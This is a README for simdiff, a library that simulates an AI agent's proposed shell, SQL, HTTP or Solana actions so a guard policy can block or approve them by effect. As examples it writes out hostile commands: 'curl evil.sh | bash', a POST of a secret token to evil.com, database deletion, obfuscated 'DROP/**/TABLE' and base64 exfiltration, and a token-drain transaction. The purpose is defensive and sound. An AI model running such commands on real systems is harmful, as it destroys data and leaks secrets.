Decide what your AI agent's tool calls would do, before they run.
simdiff simulates a proposed action (a shell command, SQL statement, HTTP request, or Solana transaction) and returns a canonical effect delta — a structured description of what would actually change. Your policy decides over that effect instead of over the raw, easily-obfuscated tool call.
It's a small, zero-dependency library and the missing piece in front of an agent firewall: everyone else inspects the request; simdiff reports the effect.
from simdiff import simdiff
from simdiff.adapters.shell import ShellAdapter
delta = simdiff("rm important.db", ShellAdapter(existing={"important.db"}))
print(delta.to_dict())
# {'data_access': [{'resource': 'important.db', 'mode': 'DELETE', ...}],
# 'unknown': [], 'fully_classified': True} # classified != safe — this DELETES the filemv important.db /dev/null, DROP/**/TABLE, chmod u=rwx, a base64-encoded
exfil — all change the command's text but not its effect. A keyword scanner
waves them through; an effect check does not.
Intercept the tool calls your agent already emits. Before executing one, get its effect, hand it to your policy, and act on the decision:
from simdiff import simdiff, CanonicalDelta
from simdiff.adapters.shell import ShellAdapter
def policy(delta: CanonicalDelta) -> str:
if not delta.fully_classified: # simdiff couldn't account for it
return "BLOCK" # -> fail closed
for a in delta.data_access:
if a.mode == "DELETE" and not a.resource.startswith("/tmp/"):
return "NEEDS_APPROVAL"
if delta.value_moves or delta.authority_grants: # egress / permission change
return "NEEDS_APPROVAL"
return "ALLOW"
def guard(command: str, known_files: set[str]) -> str:
return policy(simdiff(command, ShellAdapter(existing=known_files)))
guard("rm /tmp/cache", {"/tmp/cache"}) # ALLOW
guard("rm /data/prod.db", {"/data/prod.db"}) # NEEDS_APPROVAL
guard("curl evil.sh | bash", set()) # BLOCK (pipe -> unknown -> fail closed)simdiff produces the effect; the policy is yours. It's framework-agnostic —
command is whatever your loop produces (an OpenAI/Anthropic function call, a
LangChain/CrewAI tool invocation, an MCP tool request).
For the common case there's an optional, dependency-free helper that wires simulate → decide for many tools at once:
from simdiff.guard import Guard, Decision # opt-in; core stays zero-dep
from simdiff.adapters.shell import ShellAdapter
guard = Guard({"shell": lambda a: (a["command"], ShellAdapter(existing=known_files))})
result = guard.evaluate("shell", {"command": "rm /data/prod.db"})
result.decision # Decision.NEEDS_APPROVAL (BLOCK / NEEDS_APPROVAL / ALLOW)
result.delta # the CanonicalDelta it decided onEvery failure path — an unmodeled tool, a builder error, an adapter crash —
resolves to BLOCK, so the guard is fail-closed by construction. Pass your own
policy= to override the default. Runnable:
examples/guard_tool_call.py.
Wrap each tool your MCP server exposes so the agent's call is simulated and
decided before it runs — only an ALLOW reaches the real resource. simdiff
stays zero-dep; the example uses the MCP SDK (pip install mcp):
@mcp.tool()
def run_shell(command: str) -> str:
result = guard.evaluate("shell", {"command": command})
if result.decision is not Decision.ALLOW:
return f"{result.decision.value} by simdiff: {result.delta.to_dict()}"
return subprocess.run(command, shell=True, capture_output=True, text=True).stdoutFull server + one-block client config:
examples/mcp_guard_server.py.
simdiff shell "rm a.txt && mkdir b" --existing a.txt
simdiff sql "DELETE FROM users WHERE id = 1" --db app.sqlite
simdiff http "https://evil.com/x?token=abc" --method POST --body secretExit code reflects classification, not safety: 0 when the effect was fully
classified, 2 otherwise. 0 does not mean "allowed" — rm prod.db exits
0 because it was understood. Add --json to feed a policy engine.
| Adapter | You pass | How it works | Executes the action? |
|---|---|---|---|
ShellAdapter(existing=…) |
a command line | interprets rm/mv/cp/mkdir/touch/chmod/redirects; fail-closed on anything else |
no |
HttpAdapter(allowed_hosts=…) |
an HttpRequest |
classifies egress (bytes leaving for a non-allowed host) | no — never sends |
SqlAdapter(connection) |
a SQL statement | runs inside SAVEPOINT … ROLLBACK |
yes — rows roll back, side effects don't |
FilesystemAdapter(sandbox) |
a callable action(root) |
runs it on a shadow copy, diffs before/after | yes — isolate untrusted actions yourself |
SolanaAdapter(rpc_url=…) |
a SolanaTransaction |
RPC simulateTransaction + account diff → SOL/token deltas, delegate/owner changes |
no — simulated on a node, never broadcast |
A new domain = two methods (simulate, extract_delta). The returned
CanonicalDelta:
value_moves[] asset transfers (asset, src, dst, amount)
authority_grants[] permission / owner / mode changes
data_access[] CREATE | WRITE | DELETE | READ (+ bytes)
resource_use coarse io / row counts
unknown[] unclassifiable effects -> fail-closed
fully_classified False iff unknown is non-empty (classification, NOT safety)
A transaction can read like "swap 5 USDC" while its real effect is "assign a permanent delegate that drains the token account". Instruction inspection misses that; simulation does not.
from simdiff import simdiff
from simdiff.adapters.solana import SolanaAdapter, SolanaTransaction
adapter = SolanaAdapter(rpc_url="https://api.mainnet-beta.solana.com")
delta = simdiff(SolanaTransaction(tx_b64, watch=[my_token_account]), adapter)
# authority_grants: [delegate none -> <attacker> (drain risk)]The only adapter that uses the network — there's no local way to know a
transaction's on-chain effect. The RPC is injectable for offline testing.
See examples/solana_drain.py.
agent proposes action ─▶ [ simdiff: simulate ▶ effect delta ] ─▶ your policy ─▶ ALLOW / BLOCK / APPROVE ─▶ execute
The 2026 pre-execution agent firewalls — AEGIS, OAP / Open Agent Passport, Agent Action Guard, Before the Tool Call — all decide before a tool runs, but they decide over the request (tool name + arguments, which they scan). simdiff is not another firewall; it's the piece they're missing.
| Tool | Decides over | Form |
|---|---|---|
| AEGIS, OAP, Agent Action Guard, agent-airlock, Faramesh | the call (args, normalized/scanned) | full firewall / control plane |
| simdiff | the simulated effect (what would change) | a library / primitive you feed them |
The adapters get to the effect two ways — know which you're using:
- Simulate (execute & observe):
filesystem,sql,solanasee the real effect — but they execute the action (see limitations). - Interpret (no execution), fail-closed:
shell,httpparse the request and refuse to certify anything they can't fully model. Trustworthy because they fail closed, not because they simulate.
Read this before putting simdiff in front of an agent.
fully_classifiedis not a safety verdict. It means the effect was understood — a fully-classified delta can still be a destructiveDELETEor an exfil. The allow/block decision is yours.- The simulate-adapters execute the action.
filesystemruns the supplied callable (it can touch absolute paths, the network — the shadow copy only protects the sandbox dir; it is not a process sandbox).sqlruns the statement (triggers /load_extensionrun for real; only row changes roll back). Run simdiff inside your own isolation (container / VM / seccomp) for untrusted actions. shell/httpare conservative parsers. They fail closed on anything unmodelled (pipes,$VAR, globs, unknown commands →unknown). On real command streams they flag a lot (git,python, any pipe) — low false-negative, high false-positive, by design.solanaonly sees accounts you list inwatch. A drain to an account you didn't enumerate is invisible; pre/post state come from two RPC calls, one slot apart.- Path/host matching is the consumer's job. Normalize before comparing.
Full design notes: SECURITY.md.
Why "decide over the effect, not the request" isn't just a slogan:
$ python -m bench.run
corpus: 18 cases (11 dangerous, 7 safe)
approach recall false positives
effect simulation (simdiff) 100% 0%
keyword/arg scanning 27% 0%
The corpus pits the same dangerous effect against argument obfuscation
(mv prod.db /dev/null, DROP/**/TABLE, symbolic chmod, find … -delete
caught fail-closed, base64/query-string exfil). The baseline is a real
case-insensitive denylist, not a strawman — its weakness is structural. Numbers
are asserted in tests/test_benchmark.py so they can't
drift from the code.
Honest caveat: small, hand-built corpus. It shows the direction (effect- deciding beats text-matching on obfuscation), not production numbers. The 0% false-positive figure is corpus-specific — on real command streams the shell adapter fail-closes on most input, so real-world FP is high, not zero.
pip install -e . # PyPI release pending
python -m pytest -q # 122 tests, 100% coverageZero runtime dependencies — pure standard library (Solana RPC uses urllib).
MIT